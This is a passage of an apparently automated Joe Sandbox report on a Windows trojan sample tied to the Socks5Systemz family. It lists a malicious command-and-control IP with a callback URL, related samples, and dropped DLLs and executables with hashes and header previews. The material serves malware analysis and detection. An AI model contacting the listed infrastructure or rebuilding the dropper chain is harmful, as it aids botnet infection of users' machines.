http://www.remobjects.com/psU	file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false	URL Reputation: safe	unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d	gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000866000.00000004.00000020.00020000.00000000.sdmp, gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000845000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false		unknown
https://www.openssl.org/H	is-UG21C.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.remobjects.com/ps	file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.openssl.org/f	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false	URL Reputation: safe	unknown
http://www.certum.pl/CPS0	is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.208.158.248	ceyqbgr.net	Switzerland		34888	SIMPLECARRER2IT	true
89.105.201.183	unknown	Netherlands		24875	NOVOSERVE-ASNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520633
Start date and time:	2024-09-27 17:30:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/26@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 199 Number of non-executed functions: 250
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:31:33	API Interceptor	623663x Sleep call for process: gerdaplay3se.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.208.158.248	boSodF2WmT.exe	Get hash	malicious	Socks5Systemz	Browse
	file.exe	Get hash	malicious	Socks5Systemz	Browse
	8b8h4p07ND.exe	Get hash	malicious	Socks5Systemz	Browse
	mfRfEQGtYF.exe	Get hash	malicious	Socks5Systemz	Browse
	oFzEHfD9N6.exe	Get hash	malicious	Socks5Systemz	Browse
	Wf6rwc9MMw.exe	Get hash	malicious	Socks5Systemz	Browse
	25g5vdifBs.exe	Get hash	malicious	Socks5Systemz	Browse
	J2alzv5eSV.exe	Get hash	malicious	Socks5Systemz	Browse
	umEy816YEG.exe	Get hash	malicious	Socks5Systemz	Browse
	2775314a8dee2f5d2048bce245632405d6eac2278f10a.exe	Get hash	malicious	Socks5Systemz	Browse
89.105.201.183	cv viewer plugin 8.31.40.exe	Get hash	malicious	Socks5Systemz	Browse	200

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NOVOSERVE-ASNL	boSodF2WmT.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	mfRfEQGtYF.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	oFzEHfD9N6.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	Wf6rwc9MMw.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	25g5vdifBs.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	umEy816YEG.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	2775314a8dee2f5d2048bce245632405d6eac2278f10a.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	3ijG5xBRYz.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	QU3gBL2Pvl.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
SIMPLECARRER2IT	boSodF2WmT.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248
	http://0e0hshi.trafiklite.com/	Get hash	malicious	HTMLPhisher	Browse	185.208.158.9
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248
	WG Viridium-gruppe requests your signature on 'Viridium-gruppe Employees Benefit Enrollment.pdf'.msg	Get hash	malicious	HTMLPhisher	Browse	185.208.158.9
	https://www.google.cf/amp/%E2%80%8BjuCGrUR%E2%80%8B.%E2%80%8Bs%C2%ADun%C2%ADb%C2%ADu%C2%ADrs%C2%ADt%C2%ADsh%C2%ADe%C2%ADlti%C2%ADes%C2%AD.c%C2%ADo%C2%ADm%E2%80%8B	Get hash	malicious	HTMLPhisher	Browse	185.208.158.9
	8b8h4p07ND.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248
	EvKSsyJozV.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	mfRfEQGtYF.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248
	oFzEHfD9N6.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248
	Wf6rwc9MMw.exe	Get hash	malicious	Socks5Systemz	Browse	185.208.158.248

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)	boSodF2WmT.exe	Get hash	malicious	Socks5Systemz	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse
	file.exe	Get hash	malicious	Socks5Systemz	Browse
	8b8h4p07ND.exe	Get hash	malicious	Socks5Systemz	Browse
	EvKSsyJozV.exe	Get hash	malicious	Socks5Systemz	Browse
	mfRfEQGtYF.exe	Get hash	malicious	Socks5Systemz	Browse
	oFzEHfD9N6.exe	Get hash	malicious	Socks5Systemz	Browse
	Wf6rwc9MMw.exe	Get hash	malicious	Socks5Systemz	Browse
	25g5vdifBs.exe	Get hash	malicious	Socks5Systemz	Browse
	J2alzv5eSV.exe	Get hash	malicious	Socks5Systemz	Browse

Created / dropped Files

C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe

Download File

Process:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3264512
Entropy (8bit):	6.621138966820118
Encrypted:	false
SSDEEP:	49152:UbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:q2viP820JA3XXunANPRt
MD5:	D9BDC42F41BCE78D0C9D0FB3AC33D0DF
SHA1:	C4D13F9A91F778222B539DA02B58F3FE069F2333
SHA-256:	4BACC77E67D4ACA2F30C0D3ADF173D9BF18C0653E6362288B7481911C202736F
SHA-512:	A95F074A16F2D5B577C897DFBF147490CAEC0E9EA0B864CA70735072940974A265AA4E2BC2B1EC42106E19E676BAD47EC822B31BD0790AF207490A82BEC2FB93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ec927it43.dat

Download File

Process:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Ll/:Ll/
MD5:	6EFBBD4B588A8E19A5F96973243199AA
SHA1:	A62893F88D54BFAD713C2B6D8C608E172B4BBEB5
SHA-256:	D7C963C3F366A2D20A921D5C537B75025E344F7DBA6237A702A3B834472C105F
SHA-512:	C8D8B439AA0FD337414314F0FE2B3D3E5A0762A536542A6EC20AB35641AD2E58348C7672AE7D0348D8A618EF88061F9EF21BAF3A3658CD373C0797FF3DC40264
Malicious:	false
Reputation:	low
Preview:	...f....

C:\ProgramData\ec927rc43.dat

Download File

Process:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:cln:Un
MD5:	2DC89ABB98D04AF2C94CC8B59EBD2B63
SHA1:	C2568696F7E531313A1300CA830F7051E1A85475
SHA-256:	8D4CD219A8179C66ACD195D0F07C34721C87ED2241A9DE78A228B7B336488BC8
SHA-512:	5085394D311E525AC7B549D4353FDDAAB0BFBA3C291F4B031BA27A0EDD5B71D4DF15BC030CDB7BF09EA3CBDB858F193C9EE5302131F4A823F4CC961F1ADC0AF0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Y...

C:\ProgramData\ec927resa.dat

Download File

Process:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.9545817380615236
Encrypted:	false
SSDEEP:	3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
MD5:	98DDA7FC0B3E548B68DE836D333D1539
SHA1:	D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
SHA-256:	870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
SHA-512:	E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

C:\ProgramData\ec927resb.dat

Download File

Process:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	1.7095628900165245
Encrypted:	false
SSDEEP:	3:LDXdQSWBdMUE/:LLdQSGd
MD5:	4FFFD4D2A32CBF8FB78D521B4CC06680
SHA1:	3FA6EFA82F738740179A9388D8046619C7EBDF54
SHA-256:	EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
SHA-512:	130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	dad6f9fa0c8327344d1aa24f183c3767................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.5257884005400015
Encrypted:	false
SSDEEP:	6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
MD5:	C1D465E061D7D02895DAEB19BDB28AC9
SHA1:	5E729EE51DF080545C7031D771B85094A2B2D4E9
SHA-256:	777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
SHA-512:	438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: boSodF2WmT.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 8b8h4p07ND.exe, Detection: malicious, Browse Filename: EvKSsyJozV.exe, Detection: malicious, Browse Filename: mfRfEQGtYF.exe, Detection: malicious, Browse Filename: oFzEHfD9N6.exe, Detection: malicious, Browse Filename: Wf6rwc9MMw.exe, Detection: malicious, Browse Filename: 25g5vdifBs.exe, Detection: malicious, Browse Filename: J2alzv5eSV.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3264512
Entropy (8bit):	6.621138966820118
Encrypted:	false
SSDEEP:	49152:UbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:q2viP820JA3XXunANPRt
MD5:	D9BDC42F41BCE78D0C9D0FB3AC33D0DF
SHA1:	C4D13F9A91F778222B539DA02B58F3FE069F2333
SHA-256:	4BACC77E67D4ACA2F30C0D3ADF173D9BF18C0653E6362288B7481911C202736F
SHA-512:	A95F074A16F2D5B577C897DFBF147490CAEC0E9EA0B864CA70735072940974A265AA4E2BC2B1EC42106E19E676BAD47EC822B31BD0790AF207490A82BEC2FB93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-3CJHL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.5257884005400015
Encrypted:	false
SSDEEP:	6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
MD5:	C1D465E061D7D02895DAEB19BDB28AC9
SHA1:	5E729EE51DF080545C7031D771B85094A2B2D4E9
SHA-256:	777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
SHA-512:	438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1471856
Entropy (8bit):	6.8308189184145665
Encrypted:	false
SSDEEP:	24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
MD5:	A236287C42F921D109475D47E9DCAC2B
SHA1:	6D7C177A0AC3076383669BCE46608EB4B6B787EC
SHA-256:	63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
SHA-512:	C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-RDVP8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	6.542831007177094
Encrypted:	false
SSDEEP:	6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
MD5:	EE856A00410ECED8CC609936D01F954E
SHA1:	705D378626AEC86FECFDF04C86244006BC3AF431
SHA-256:	B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
SHA-512:	666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4.$QN.%4.$.N.%4.$IN.%4.$YN.%..$HN.%..$GN.%..$KN.%..$XN.%[N.%.O.%..$iN.%..$ZN.%.e%ZN.%..$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-T0OEI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	3264512
Entropy (8bit):	6.621138809004119
Encrypted:	false
SSDEEP:	49152:bbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:t2viP820JA3XXunANPRt
MD5:	A8740950E0037721B6C0B49E9C07BEBB
SHA1:	44E25D73106445E81AC5049E89D4FB862388ED12
SHA-256:	1A74AE8780E1EDAFA3639FDE58E9BB8F4960F666681531E1DE67BDC074C81ABC
SHA-512:	0A98D882A71699C4002A8D0B71CC973867EBE6A98B2BBEDA7EDFFE9196C2D82CC71B6D4498C327A016A09A4E5D6C027B3EAAB7ED1F0289D058EBD90A7ACADF61
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\is-UG21C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719720
Entropy (8bit):	6.620042925263483
Encrypted:	false
SSDEEP:	12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
MD5:	20B6B06BBD211A8ACFE51193653E4167
SHA1:	817D442B46DD6F35FD9641E0C7262C934ED76848
SHA-256:	7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
SHA-512:	0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?\|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1471856
Entropy (8bit):	6.8308189184145665
Encrypted:	false
SSDEEP:	24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
MD5:	A236287C42F921D109475D47E9DCAC2B
SHA1:	6D7C177A0AC3076383669BCE46608EB4B6B787EC
SHA-256:	63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
SHA-512:	C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\libssl-1_1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719720
Entropy (8bit):	6.620042925263483
Encrypted:	false
SSDEEP:	12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
MD5:	20B6B06BBD211A8ACFE51193653E4167
SHA1:	817D442B46DD6F35FD9641E0C7262C934ED76848
SHA-256:	7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
SHA-512:	0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?\|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Gerda Play3 SE\msvcp71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
